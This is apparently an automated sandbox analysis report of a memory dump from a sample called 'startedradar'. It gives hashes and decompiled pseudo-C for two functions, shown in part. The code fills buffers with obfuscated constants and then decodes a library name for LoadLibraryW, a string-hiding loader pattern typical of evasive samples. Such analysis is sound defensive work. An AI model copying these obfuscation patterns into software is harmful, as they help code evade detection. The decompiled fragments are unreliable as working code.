Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Heap$FreeLibraryLoadProcess
String ID: $'i$)VB:$*$>ZX\$Lm$t!i$t_`n$xf-u$~@$ B2$\R
API String ID: 872250060-2707197102
Opcode ID: de79da880e84dfeed983c5c7f25a10d0ecde88903fa2df26fdfbec021a126baf
Instruction ID: f552eaadf08befefd41c1badc848e4b6df4bf18f71686336a4f4fb48570ec355
Opcode Fuzzy Hash: de79da880e84dfeed983c5c7f25a10d0ecde88903fa2df26fdfbec021a126baf
Instruction Fuzzy Hash: A652B6F48163698FDBA19F429A896CDBB74BB11744F6082C8C25D3B215CB744BC6CF89

Uniqueness

Uniqueness Score: 100.00%

Function 00118B2A, Relevance: 23.0, APIs: 3, Strings: 10, Instructions: 288
memorylibraryUNIQUE

C-Code - Quality: 95%

			E00118B2A(void* __esi, void* __eflags) {
				int _t273;
				void* _t275;
				intOrPtr _t277;
				void* _t280;
				void* _t282;
				void* _t283;
				void* _t284;

				 *((intOrPtr*)(_t284 - 0x430)) = 0xaf709e67;
				 *((intOrPtr*)(_t284 - 0x42c)) = 0x1163a71d;
				 *((intOrPtr*)(_t284 - 0x428)) = 0x4e215be2;
				 *((intOrPtr*)(_t284 - 0x424)) = 0x19bceaf9;
				 *((intOrPtr*)(_t284 - 0x420)) = 0xa91d265;
				 *((intOrPtr*)(_t284 - 0x41c)) = 0xf82a1363;
				 *((intOrPtr*)(_t284 - 0x418)) = 0x6e808938;
				 *((intOrPtr*)(_t284 - 0x414)) = 0x98c7da5c;
				 *((intOrPtr*)(_t284 - 0x410)) = 0xc8adebec;
				 *((intOrPtr*)(_t284 - 0x40c)) = 0x77677182;
				 *((intOrPtr*)(_t284 - 0x408)) = 0xc11d7675;
				 *((intOrPtr*)(_t284 - 0x404)) = 0xa0508401;
				 *((intOrPtr*)(_t284 - 0x400)) = 0x876a05d6;
				 *((intOrPtr*)(_t284 - 0x3fc)) = 0x9081f2c7;
				 *((intOrPtr*)(_t284 - 0x3f8)) = 0xc48e2074;
				 *((intOrPtr*)(_t284 - 0x3f4)) = 0x7807f188;
				 *((intOrPtr*)(_t284 - 0x3f0)) = 0x4fcdd0e;
				 *((intOrPtr*)(_t284 - 0x3ec)) = 0x881b8662;
				 *((intOrPtr*)(_t284 - 0x3e8)) = 0x1a3292c8;
				 *((intOrPtr*)(_t284 - 0x3e4)) = 0x1b6da59f;
				 *((intOrPtr*)(_t284 - 0x3e0)) = 0x6b28c3db;
				 *((intOrPtr*)(_t284 - 0x3dc)) = 0xda448878;
				 *((intOrPtr*)(_t284 - 0x3d8)) = 0x5a5cda93;
				 *((intOrPtr*)(_t284 - 0x3d4)) = 0x357254a9;
				 *((intOrPtr*)(_t284 - 0x3d0)) = 0xf5d47e7f;
				 *((intOrPtr*)(_t284 - 0x3cc)) = 0x73f8b64e;
				 *((intOrPtr*)(_t284 - 0x3c8)) = 0xb2e97c98;
				 *((intOrPtr*)(_t284 - 0x3c4)) = 0x3a85e2c1;
				 *((intOrPtr*)(_t284 - 0x3c0)) = 0x3178e38c;
				 *((intOrPtr*)(_t284 - 0x3bc)) = 0x3cef46f6;
				 *((intOrPtr*)(_t284 - 0x3b8)) = 0x10bc6fd5;
				 *((intOrPtr*)(_t284 - 0x3b4)) = 0x7141317;
				 *((intOrPtr*)(_t284 - 0x3b0)) = 0x1cb45dfe;
				 *((intOrPtr*)(_t284 - 0x3ac)) = 0x84231081;
				 *((intOrPtr*)(_t284 - 0x3a8)) = 0x30e76b09;
				 *((intOrPtr*)(_t284 - 0x3a4)) = 0x4d4fc90a;
				 *((intOrPtr*)(_t284 - 0x3a0)) = 0xca1ab3fd;
				 *((intOrPtr*)(_t284 - 0x39c)) = 0xede0e45a;
				 *((intOrPtr*)(_t284 - 0x398)) = 0x6be617d1;
				 *((intOrPtr*)(_t284 - 0x394)) = 0x97395634;
				 *((intOrPtr*)(_t284 - 0x390)) = 0xdc008303;
				 *((intOrPtr*)(_t284 - 0x38c)) = 0x1bbe291a;
				 *((intOrPtr*)(_t284 - 0x388)) = 0x1fa131f2;
				 *((intOrPtr*)(_t284 - 0x384)) = 0x65258f83;
				 *((intOrPtr*)(_t284 - 0x380)) = 0xbbfc5afb;
				 *((intOrPtr*)(_t284 - 0x37c)) = 0x4f70604d;
				 *((intOrPtr*)(_t284 - 0x378)) = 0x7edeb9fa;
				 *((intOrPtr*)(_t284 - 0x374)) = 0x97c728ef;
				 *((intOrPtr*)(_t284 - 0x370)) = 0x38cb8d38;
				 *((intOrPtr*)(_t284 - 0x36c)) = 0x286c3af9;
				 *((intOrPtr*)(_t284 - 0x368)) = 0xb3aff7af;
				 *((intOrPtr*)(_t284 - 0x364)) = 0x17cf560a;
				 *((intOrPtr*)(_t284 - 0x360)) = 0xcdcd756e;
				 *((intOrPtr*)(_t284 - 0x35c)) = 0x1ac03899;
				 *((intOrPtr*)(_t284 - 0x358)) = 0xd1ed7e7;
				 *((intOrPtr*)(_t284 - 0x354)) = 0x6a58d108;
				 *((intOrPtr*)(_t284 - 0x350)) = 0x70baf019;
				 *((intOrPtr*)(_t284 - 0x34c)) = 0x1f190eb1;
				 *((intOrPtr*)(_t284 - 0x348)) = 0x7d6ac9a2;
				 *((intOrPtr*)(_t284 - 0x344)) = 0x6eb46f28;
				 *((intOrPtr*)(_t284 - 0x340)) = 0xea7053fc;
				 *((intOrPtr*)(_t284 - 0x33c)) = 0x16086f74;
				 *((intOrPtr*)(_t284 - 0x338)) = 0xb36bf086;
				 *((intOrPtr*)(_t284 - 0x334)) = 0x9919b3ce;
				 *((intOrPtr*)(_t284 - 0x330)) = 0x73c7d9e8;
				 *((intOrPtr*)(_t284 - 0x32c)) = 0xb9e9eac7;
				 *((intOrPtr*)(_t284 - 0x328)) = 0x7a2806a8;
				 *((intOrPtr*)(_t284 - 0x324)) = 0x5ff66e76;
				 *((intOrPtr*)(_t284 - 0x320)) = 0xb4aeb549;
				 *((intOrPtr*)(_t284 - 0x31c)) = 0xc7b18370;
				 *((intOrPtr*)(_t284 - 0x318)) = 0x51c87220;
				 *((intOrPtr*)(_t284 - 0x314)) = 0xa2573e1;
				 *((intOrPtr*)(_t284 - 0x310)) = 0x5244303c;
				 *((intOrPtr*)(_t284 - 0x30c)) = 0x6ac6cac3;
				 *((intOrPtr*)(_t284 - 0x308)) = 0xbb2d84a9;
				 *((intOrPtr*)(_t284 - 0x304)) = 0x5275873c;
				 *((intOrPtr*)(_t284 - 0x300)) = 0xa6de334d;
				 *((intOrPtr*)(_t284 - 0x2fc)) = 0xf528764d;
				 *((intOrPtr*)(_t284 - 0x2f8)) = 0x53a5b803;
				 *((intOrPtr*)(_t284 - 0x2f4)) = 0xe7d9fd2e;
				 *((intOrPtr*)(_t284 - 0x2f0)) = 0xd1cf7bc1;
				 *((intOrPtr*)(_t284 - 0x2ec)) = 0x716bc8ea;
				 *((intOrPtr*)(_t284 - 0x2e8)) = 0xa86e2fa5;
				 *((intOrPtr*)(_t284 - 0x2e4)) = 0xb485810b;
				 *((intOrPtr*)(_t284 - 0x2e0)) = 0x14fa3a6;
				 *((intOrPtr*)(_t284 - 0x2dc)) = 0x703ab5a7;
				 *((intOrPtr*)(_t284 - 0x2d8)) = 0x836b3e3f;
				 *((intOrPtr*)(_t284 - 0x2d4)) = 0xde047161;
				 *((intOrPtr*)(_t284 - 0x2d0)) = 0xad4662ab;
				 *((intOrPtr*)(_t284 - 0x2cc)) = 0x146f4fdf;
				 *((intOrPtr*)(_t284 - 0x2c8)) = 0xcacf051e;
				 *((intOrPtr*)(_t284 - 0x2c4)) = 0x4c4ec529;
				 *((intOrPtr*)(_t284 - 0x2c0)) = 0x65d4fb8;
				 *((intOrPtr*)(_t284 - 0x2bc)) = 0x585efb5d;
				 *((intOrPtr*)(_t284 - 0x2b8)) = 0x8814d895;
				 *((intOrPtr*)(_t284 - 0x2b4)) = 0xdb36feaa;
				 *((intOrPtr*)(_t284 - 0x2b0)) = 0x42a7509b;
				 *((intOrPtr*)(_t284 - 0x2ac)) = 0x50f2cfee;
				 *((intOrPtr*)(_t284 - 0x2a8)) = 0x7949fb0e;
				 *((intOrPtr*)(_t284 - 0x2a4)) = 0x3c4576fa;
				 *((intOrPtr*)(_t284 - 0x2a0)) = 0x104dc731;
				 *((intOrPtr*)(_t284 - 0x29c)) = 0x4f579a08;
				 *((intOrPtr*)(_t284 - 0x298)) = 0x49ef92cf;
				 *((intOrPtr*)(_t284 - 0x294)) = 0x591d935f;
				 *((intOrPtr*)(_t284 - 0x290)) = 0x4b44cf8;
				 *((intOrPtr*)(_t284 - 0x28c)) = 0x87631a53;
				 *((intOrPtr*)(_t284 - 0x288)) = 0x28518c37;
				 *((intOrPtr*)(_t284 - 0x284)) = 0xe1b72a74;
				 *((intOrPtr*)(_t284 - 0x280)) = 0xd1cb6f5c;
				 *((intOrPtr*)(_t284 - 0x27c)) = 0xf48436d8;
				 *((intOrPtr*)(_t284 - 0x278)) = 0x81307b06;
				 *((intOrPtr*)(_t284 - 0x274)) = 0xe03d9e96;
				 *((intOrPtr*)(_t284 - 0x270)) = 0x5b40c1bf;
				 *((intOrPtr*)(_t284 - 0x26c)) = 0x683da5f7;
				 *((intOrPtr*)(_t284 - 0x268)) = 0xc5dacac8;
				 *((intOrPtr*)(_t284 - 0x264)) = 0xe7e5f0f1;
				 *((intOrPtr*)(_t284 - 0x260)) = 0xb332d9fa;
				 *((intOrPtr*)(_t284 - 0x25c)) = 0x6870953f;
				 *((intOrPtr*)(_t284 - 0x258)) = 0x783f7efa;
				 *((intOrPtr*)(_t284 - 0x254)) = 0xae4fa740;
				 *((intOrPtr*)(_t284 - 0x250)) = 0x7f79a4ac;
				 *((intOrPtr*)(_t284 - 0x24c)) = 0xdc5b77cf;
				 *((intOrPtr*)(_t284 - 0x248)) = 0x25da523d;
				 *((intOrPtr*)(_t284 - 0x244)) = 0xe0d312fe;
				 *((intOrPtr*)(_t284 - 0x240)) = 0xd2dff747;
				 *((intOrPtr*)(_t284 - 0x23c)) = 0x7022095;
				 *((intOrPtr*)(_t284 - 0x238)) = 0x719a7b0b;
				 *((intOrPtr*)(_t284 - 0x234)) = 0x7970fd46;
				 *((intOrPtr*)(_t284 - 0x230)) = 0x15b2d04a;
				 *((intOrPtr*)(_t284 - 0x22c)) = 0xcc3b50c3;
				 *((intOrPtr*)(_t284 - 0x228)) = 0x5d96658a;
				 *((intOrPtr*)(_t284 - 0x224)) = 0x5091a0a8;
				 *((intOrPtr*)(_t284 - 0x220)) = 0xab518f9;
				 *((intOrPtr*)(_t284 - 0x21c)) = 0x4f751827;
				 *((intOrPtr*)(_t284 - 0x218)) = 0x947dd9aa;
				 *((intOrPtr*)(_t284 - 0x214)) = 0xbfbbb83e;
				 *((intOrPtr*)(_t284 - 0x210)) = 0x3b76d3f;
				 *((intOrPtr*)(_t284 - 0x20c)) = 0xf9878d9d;
				 *((intOrPtr*)(_t284 - 0x208)) = 0xf8ea9dae;
				 *((intOrPtr*)(_t284 - 0x204)) = 0x6133bef0;
				 *((intOrPtr*)(_t284 - 0x200)) = 0x76e6f97b;
				 *((intOrPtr*)(_t284 - 0x1fc)) = 0x5e025c72;
				 *((intOrPtr*)(_t284 - 0x1f8)) = 0x4752fe5;
				 *((intOrPtr*)(_t284 - 0x1f4)) = 0xfdcd733f;
				 *((intOrPtr*)(_t284 - 0x1f0)) = 0xcbbf6b7e;
				 *((intOrPtr*)(_t284 - 0x1ec)) = 0xf32a2264;
				 *((intOrPtr*)(_t284 - 0x1e8)) = 0xbec1ac14;
				 *((intOrPtr*)(_t284 - 0x1e4)) = 0x9f1483c4;
				 *((intOrPtr*)(_t284 - 0x1e0)) = 0x92065933;
				 *((intOrPtr*)(_t284 - 0x1dc)) = 0x51ff9fa1;
				 *((intOrPtr*)(_t284 - 0x1d8)) = 0x625a13b4;
				 *((intOrPtr*)(_t284 - 0x1d4)) = 0x2ded854;
				 *((intOrPtr*)(_t284 - 0x1d0)) = 0xb6117717;
				 *((intOrPtr*)(_t284 - 0x1cc)) = 0x91e781f9;
				 *((intOrPtr*)(_t284 - 0x1c8)) = 0xcd6f92f7;
				 *((intOrPtr*)(_t284 - 0x1c4)) = 0x87a2363d;
				 *((intOrPtr*)(_t284 - 0x1c0)) = 0x13b8268e;
				 *((intOrPtr*)(_t284 - 0x1bc)) = 0x2580013;
				 *((intOrPtr*)(_t284 - 0x1b8)) = 0x5ecdb453;
				 *((intOrPtr*)(_t284 - 0x1b4)) = 0x34b5737;
				 *((intOrPtr*)(_t284 - 0x1b0)) = 0xab27928e;
				 *((intOrPtr*)(_t284 - 0x1ac)) = 0x332b8ed3;
				 *((intOrPtr*)(_t284 - 0x1a8)) = 0x7f922841;
				 *((intOrPtr*)(_t284 - 0x1a4)) = 0x7e650469;
				 *((intOrPtr*)(_t284 - 0x1a0)) = 0xd5cf8ddc;
				 *((intOrPtr*)(_t284 - 0x19c)) = 0xf2a7d7c;
				 *((intOrPtr*)(_t284 - 0x198)) = 0x139aa2bd;
				 *((intOrPtr*)(_t284 - 0x194)) = 0x180a5291;
				 *((intOrPtr*)(_t284 - 0x190)) = 0xab8c0cb8;
				 *((intOrPtr*)(_t284 - 0x18c)) = 0xea542bff;
				 *((intOrPtr*)(_t284 - 0x188)) = 0xc0c12a40;
				 *((intOrPtr*)(_t284 - 0x184)) = 0xb850ac98;
				 *((intOrPtr*)(_t284 - 0x180)) = 0x1bf805ad;
				 *((intOrPtr*)(_t284 - 0x17c)) = 0x7907e523;
				 *((intOrPtr*)(_t284 - 0x178)) = 0xe8c03c27;
				 *((intOrPtr*)(_t284 - 0x174)) = 0x85cd6441;
				 *((intOrPtr*)(_t284 - 0x170)) = 0xc7d5e05c;
				 *((intOrPtr*)(_t284 - 0x16c)) = 0xc3189a81;
				 *((intOrPtr*)(_t284 - 0x168)) = 0x479f2e5f;
				 *((intOrPtr*)(_t284 - 0x164)) = 0x6c3275b5;
				 *((intOrPtr*)(_t284 - 0x160)) = 0x965b94c0;
				 *((intOrPtr*)(_t284 - 0x15c)) = 0x79db8e5e;
				 *((intOrPtr*)(_t284 - 0x158)) = 0x9963eb1a;
				 *((intOrPtr*)(_t284 - 0x154)) = 0x566b7606;
				 *((intOrPtr*)(_t284 - 0x150)) = 0x34268710;
				 *((intOrPtr*)(_t284 - 0x14c)) = 0xb16c33fb;
				 *((intOrPtr*)(_t284 - 0x148)) = 0xa9e70d08;
				 *((intOrPtr*)(_t284 - 0x144)) = 0xa4f0ba81;
				 *((intOrPtr*)(_t284 - 0x140)) = 0x5dbef4f;
				 *((intOrPtr*)(_t284 - 0x13c)) = 0x186f7a9e;
				 *((intOrPtr*)(_t284 - 0x138)) = 0x6189fd9a;
				 *((intOrPtr*)(_t284 - 0x134)) = 0x88407b08;
				 *((intOrPtr*)(_t284 - 0x130)) = 0x3153193f;
				 *((intOrPtr*)(_t284 - 0x12c)) = 0x67230cd3;
				 *((intOrPtr*)(_t284 - 0x128)) = 0x5fd0a1fe;
				 *((intOrPtr*)(_t284 - 0x124)) = 0x356453bb;
				 *((intOrPtr*)(_t284 - 0x120)) = 0x7c6cf28b;
				 *((intOrPtr*)(_t284 - 0x11c)) = 0xca12322b;
				 *((intOrPtr*)(_t284 - 0x118)) = 0x3ffcc3c2;
				 *((intOrPtr*)(_t284 - 0x114)) = 0x442ea63e;
				 *((intOrPtr*)(_t284 - 0x110)) = 0xef0f8a02;
				 *((intOrPtr*)(_t284 - 0x10c)) = 0xa1aadcfb;
				 *((intOrPtr*)(_t284 - 0x108)) = 0x97db4dc8;
				 *((intOrPtr*)(_t284 - 0x104)) = 0xb5745228;
				 *((intOrPtr*)(_t284 - 0x100)) = 0x92edbdaf;
				 *((intOrPtr*)(_t284 - 0xfc)) = 0x3d612b8;
				 *((intOrPtr*)(_t284 - 0xf8)) = 0x2acb5d86;
				 *((intOrPtr*)(_t284 - 0xf4)) = 0xb378ebbf;
				 *((intOrPtr*)(_t284 - 0xf0)) = 0x888f56a5;
				 *((intOrPtr*)(_t284 - 0xec)) = 0xb44281f4;
				 *((intOrPtr*)(_t284 - 0xe8)) = 0x1e5aefa2;
				 *((intOrPtr*)(_t284 - 0xe4)) = 0xe64825e9;
				 *((intOrPtr*)(_t284 - 0xe0)) = 0x8648df89;
				 *((intOrPtr*)(_t284 - 0xdc)) = 0x115ea883;
				 *((intOrPtr*)(_t284 - 0xd8)) = 0x3af74aa7;
				 *((intOrPtr*)(_t284 - 0xd4)) = 0x202a9a87;
				 *((intOrPtr*)(_t284 - 0xd0)) = 0xbf893e19;
				 *((intOrPtr*)(_t284 - 0xcc)) = 0x69d7038c;
				 *((intOrPtr*)(_t284 - 0xc8)) = 0x7c71740b;
				 *((intOrPtr*)(_t284 - 0xc4)) = 0xc7ccad21;
				 *((intOrPtr*)(_t284 - 0xc0)) = 0xee01f4da;
				 *((intOrPtr*)(_t284 - 0xbc)) = 0x68406b5e;
				 *((intOrPtr*)(_t284 - 0xb8)) = 0x93566171;
				 *((intOrPtr*)(_t284 - 0xb4)) = 0xbc3b2234;
				 *((intOrPtr*)(_t284 - 0xb0)) = 0x6f738a8f;
				 *((intOrPtr*)(_t284 - 0xac)) = 0x924d71cd;
				 *((intOrPtr*)(_t284 - 0xa8)) = 0xccae1042;
				 *((intOrPtr*)(_t284 - 0xa4)) = 0x6b902c01;
				 *((intOrPtr*)(_t284 - 0xa0)) = 0xdaaf197b;
				 *((intOrPtr*)(_t284 - 0x9c)) = 0x5e5aebef;
				 *((intOrPtr*)(_t284 - 0x98)) = 0x8fb5e58c;
				 *((intOrPtr*)(_t284 - 0x94)) = 0xf5fe6f7e;
				 *((intOrPtr*)(_t284 - 0x90)) = 0xc7957f25;
				 *((intOrPtr*)(_t284 - 0x8c)) = 0x7c49cf4e;
				 *((intOrPtr*)(_t284 - 0x88)) = 0x6a7edd29;
				 *((intOrPtr*)(_t284 - 0x84)) = 0x30389426;
				 *((intOrPtr*)(_t284 - 0x80)) = 0xb39b1eb;
				 *((intOrPtr*)(_t284 - 0x7c)) = 0x32da1600;
				 *((intOrPtr*)(_t284 - 0x78)) = 0xdc7fb1ae;
				 *((intOrPtr*)(_t284 - 0x74)) = 0x2337eb3c;
				 *((intOrPtr*)(_t284 - 0x70)) = 0xafd2921b;
				 *((intOrPtr*)(_t284 - 0x6c)) = 0x51dd5891;
				 *((intOrPtr*)(_t284 - 0x68)) = 0xacc11b49;
				 *((intOrPtr*)(_t284 - 0x64)) = 0x23a45974;
				 *((intOrPtr*)(_t284 - 0x60)) = 0x832c3c3f;
				 *((intOrPtr*)(_t284 - 0x5c)) = 0x562f46e;
				 *((intOrPtr*)(_t284 - 0x58)) = 0xba5bcd86;
				 *((intOrPtr*)(_t284 - 0x54)) = 0x7359cfcf;
				 *((intOrPtr*)(_t284 - 0x50)) = 0xcabec7c;
				 *((intOrPtr*)(_t284 - 0x4c)) = 0x9697f9c0;
				 *((intOrPtr*)(_t284 - 0x48)) = 0x35db867b;
				 *((intOrPtr*)(_t284 - 0x44)) = 0xa97d7963;
				 *((intOrPtr*)(_t284 - 0x40)) = 0x147bfba5;
				 *((intOrPtr*)(_t284 - 0x3c)) = 0x2596c387;
				 *((intOrPtr*)(_t284 - 0x38)) = 0x7ee5d084;
				 *((intOrPtr*)(_t284 - 0x34)) = 0x8c122eb4;
				 *((intOrPtr*)(_t284 - 0x30)) = 0x5766d9df;
				 *((intOrPtr*)(_t284 - 0x2c)) = 0x4d281f85;
				 *((intOrPtr*)(_t284 - 0x28)) = 0x2062f8bf;
				 *((intOrPtr*)(_t284 - 0x24)) = 0xfb193eb3;
				 *((intOrPtr*)(_t284 - 0x20)) = 0x64e2007f;
				 *((intOrPtr*)(_t284 - 0x1c)) = 0x377c16ec;
				 *((intOrPtr*)(_t284 - 0x18)) = 0x98aeaae7;
				 *((intOrPtr*)(_t284 - 0x14)) = 0xcfe1fba1;
				 *((intOrPtr*)(_t284 - 0x10)) = 0xd5013e25;
				 *((intOrPtr*)(_t284 - 0xc)) = 0x145b8804;
				 *((intOrPtr*)(_t284 - 8)) = 0xdc6b19a2;
				 *((intOrPtr*)(_t284 - 4)) = 0xd0c5ad00;
				_t282 = L00111D00(0x1231f0, 0x1a0, _t280);
				 *0x127c84 = LoadLibraryW(_t282);
				_t273 = HeapFree(GetProcessHeap(), 0, _t282);
				_t277 =  *0x127c84; // 0x771d0000
				_t283 = 0x1f5c6a;
				if(_t277 != 0) {
					goto 0x3017a4;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return L00111480(_t275, _t277, _t284 - 0x430, _t280, _t283);
				} else {
					goto 0x301791;
					return _t273;
				}
			}

APIs

LoadLibraryW.KERNEL32(00000000), ref: 0011955C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0011956A
HeapFree.KERNEL32(00000000), ref: 00119571

Strings

%H, xrefs: 00119368
s%, xrefs: 00118DF0
<7#, xrefs: 00119477
<0DR, xrefs: 00118DFA
Z, xrefs: 00118C9C
[!N, xrefs: 00118B3E
Z^, xrefs: 0011941C
^k@h, xrefs: 001193CC
k0, xrefs: 00118C7E
M`pO, xrefs: 00118CEC

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Heap$FreeLibraryLoadProcess
String ID: k0$<0DR$<7#$M`pO$Z$^k@h$%H$[!N$s%$Z^
API String ID: 872250060-2301064221
Opcode ID: 418466ad42deef8f151bd1cf07229076835af91d2c02d288db12ecb88b5d6d54
Instruction ID: 62c16daed910a66e77966b3ad2a1199a849bcde4ade3ce96bcd4f78b4a5a0adc
Opcode Fuzzy Hash: 418466ad42deef8f151bd1cf07229076835af91d2c02d288db12ecb88b5d6d54
Instruction Fuzzy Hash: 9422B6B48163A9CBDB62DF829A897CDBA74FB11344F6086C8D1593B214CB750BC2CF85

Uniqueness

Uniqueness Score: 100.00%

Function 00116BAA, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 167
memorylibraryUNIQUE

C-Code - Quality: 92%

			E00116BAA(void* __esi, void* __eflags) {
				int _t152;
				void* _t154;
				intOrPtr _t156;
				void* _t159;
				void* _t161;
				void* _t162;
				void* _t163;

				 *((intOrPtr*)(_t163 - 0x24c)) = 0x71744fb1;
				 *((intOrPtr*)(_t163 - 0x248)) = 0x45d6f7ed;
				 *((intOrPtr*)(_t163 - 0x244)) = 0x8dff7e89;
				 *((intOrPtr*)(_t163 - 0x240)) = 0x7ffd7be0;
				 *((intOrPtr*)(_t163 - 0x23c)) = 0x9fdeeae2;
				 *((intOrPtr*)(_t163 - 0x238)) = 0x786d5615;
				 *((intOrPtr*)(_t163 - 0x234)) = 0x604ea1f7;
				 *((intOrPtr*)(_t163 - 0x230)) = 0x411f1ad5;
				 *((intOrPtr*)(_t163 - 0x22c)) = 0xa612af75;
				 *((intOrPtr*)(_t163 - 0x228)) = 0x35c83646;
				 *((intOrPtr*)(_t163 - 0x224)) = 0xda68584a;
				 *((intOrPtr*)(_t163 - 0x220)) = 0xf9c4ef99;
				 *((intOrPtr*)(_t163 - 0x21c)) = 0x1ffb17c6;
				 *((intOrPtr*)(_t163 - 0x218)) = 0x2a559a64;
				 *((intOrPtr*)(_t163 - 0x214)) = 0x349ee742;
				 *((intOrPtr*)(_t163 - 0x210)) = 0x4a11520f;
				 *((intOrPtr*)(_t163 - 0x20c)) = 0x1b55063a;
				 *((intOrPtr*)(_t163 - 0x208)) = 0x1fbc74ec;
				 *((intOrPtr*)(_t163 - 0x204)) = 0x8afa589d;
				 *((intOrPtr*)(_t163 - 0x200)) = 0xe126f3ae;
				 *((intOrPtr*)(_t163 - 0x1fc)) = 0x1298effd;
				 *((intOrPtr*)(_t163 - 0x1f8)) = 0x551a0a77;
				 *((intOrPtr*)(_t163 - 0x1f4)) = 0x1eb6f591;
				 *((intOrPtr*)(_t163 - 0x1f0)) = 0xc744f596;
				 *((intOrPtr*)(_t163 - 0x1ec)) = 0x2d03d841;
				 *((intOrPtr*)(_t163 - 0x1e8)) = 0x748f9909;
				 *((intOrPtr*)(_t163 - 0x1e4)) = 0x6f96c2cf;
				 *((intOrPtr*)(_t163 - 0x1e0)) = 0xda278cdd;
				 *((intOrPtr*)(_t163 - 0x1dc)) = 0x4b1980d2;
				 *((intOrPtr*)(_t163 - 0x1d8)) = 0xb6d4c647;
				 *((intOrPtr*)(_t163 - 0x1d4)) = 0x6e4a8f8c;
				 *((intOrPtr*)(_t163 - 0x1d0)) = 0x806b9650;
				 *((intOrPtr*)(_t163 - 0x1cc)) = 0xb1bcf103;
				 *((intOrPtr*)(_t163 - 0x1c8)) = 0x74c5c597;
				 *((intOrPtr*)(_t163 - 0x1c4)) = 0xdfc78e4f;
				 *((intOrPtr*)(_t163 - 0x1c0)) = 0x58f7a652;
				 *((intOrPtr*)(_t163 - 0x1bc)) = 0xb120ea26;
				 *((intOrPtr*)(_t163 - 0x1b8)) = 0xfcfae165;
				 *((intOrPtr*)(_t163 - 0x1b4)) = 0x3808541e;
				 *((intOrPtr*)(_t163 - 0x1b0)) = 0x955dd695;
				 *((intOrPtr*)(_t163 - 0x1ac)) = 0x9ecdac3a;
				 *((intOrPtr*)(_t163 - 0x1a8)) = 0x8ed5f281;
				 *((intOrPtr*)(_t163 - 0x1a4)) = 0x6bdaf004;
				 *((intOrPtr*)(_t163 - 0x1a0)) = 0xb3361c8c;
				 *((intOrPtr*)(_t163 - 0x19c)) = 0x83fe0156;
				 *((intOrPtr*)(_t163 - 0x198)) = 0x60152a13;
				 *((intOrPtr*)(_t163 - 0x194)) = 0x21a109a0;
				 *((intOrPtr*)(_t163 - 0x190)) = 0xae50f5aa;
				 *((intOrPtr*)(_t163 - 0x18c)) = 0xe5d42415;
				 *((intOrPtr*)(_t163 - 0x188)) = 0xff326d0f;
				 *((intOrPtr*)(_t163 - 0x184)) = 0x33dc58fa;
				 *((intOrPtr*)(_t163 - 0x180)) = 0xd788fcbe;
				 *((intOrPtr*)(_t163 - 0x17c)) = 0x52185b40;
				 *((intOrPtr*)(_t163 - 0x178)) = 0x40a35bee;
				 *((intOrPtr*)(_t163 - 0x174)) = 0x2a5f460b;
				 *((intOrPtr*)(_t163 - 0x170)) = 0x32ba9a31;
				 *((intOrPtr*)(_t163 - 0x16c)) = 0xca034b44;
				 *((intOrPtr*)(_t163 - 0x168)) = 0x54132d4f;
				 *((intOrPtr*)(_t163 - 0x164)) = 0x91ae1d70;
				 *((intOrPtr*)(_t163 - 0x160)) = 0x7ac24f93;
				 *((intOrPtr*)(_t163 - 0x15c)) = 0xf37f4232;
				 *((intOrPtr*)(_t163 - 0x158)) = 0xa6615044;
				 *((intOrPtr*)(_t163 - 0x154)) = 0xc47febf8;
				 *((intOrPtr*)(_t163 - 0x150)) = 0xb29e162d;
				 *((intOrPtr*)(_t163 - 0x14c)) = 0x21378b1c;
				 *((intOrPtr*)(_t163 - 0x148)) = 0x78a5ce5c;
				 *((intOrPtr*)(_t163 - 0x144)) = 0x61bc1d21;
				 *((intOrPtr*)(_t163 - 0x140)) = 0xea2ecede;
				 *((intOrPtr*)(_t163 - 0x13c)) = 0xa791dede;
				 *((intOrPtr*)(_t163 - 0x138)) = 0xa7887afd;
				 *((intOrPtr*)(_t163 - 0x134)) = 0xe171ecb5;
				 *((intOrPtr*)(_t163 - 0x130)) = 0xce33962f;
				 *((intOrPtr*)(_t163 - 0x12c)) = 0xb256e05d;
				 *((intOrPtr*)(_t163 - 0x128)) = 0xa0cac220;
				 *((intOrPtr*)(_t163 - 0x124)) = 0xee34e364;
				 *((intOrPtr*)(_t163 - 0x120)) = 0x6e140336;
				 *((intOrPtr*)(_t163 - 0x11c)) = 0x60420845;
				 *((intOrPtr*)(_t163 - 0x118)) = 0x9392cfe6;
				 *((intOrPtr*)(_t163 - 0x114)) = 0x5f5c3139;
				 *((intOrPtr*)(_t163 - 0x110)) = 0x81289ce0;
				 *((intOrPtr*)(_t163 - 0x10c)) = 0x36617698;
				 *((intOrPtr*)(_t163 - 0x108)) = 0x64028be8;
				 *((intOrPtr*)(_t163 - 0x104)) = 0x3b8df82c;
				 *((intOrPtr*)(_t163 - 0x100)) = 0xf98f5a76;
				 *((intOrPtr*)(_t163 - 0xfc)) = 0x7e1fec4c;
				 *((intOrPtr*)(_t163 - 0xf8)) = 0x42677be5;
				 *((intOrPtr*)(_t163 - 0xf4)) = 0xc60b584c;
				 *((intOrPtr*)(_t163 - 0xf0)) = 0x5fcd2f06;
				 *((intOrPtr*)(_t163 - 0xec)) = 0xf8cbcfec;
				 *((intOrPtr*)(_t163 - 0xe8)) = 0xe5761a4b;
				 *((intOrPtr*)(_t163 - 0xe4)) = 0x7e5f1912;
				 *((intOrPtr*)(_t163 - 0xe0)) = 0x4566e5df;
				 *((intOrPtr*)(_t163 - 0xdc)) = 0x31d3fc58;
				 *((intOrPtr*)(_t163 - 0xd8)) = 0x42ad45b1;
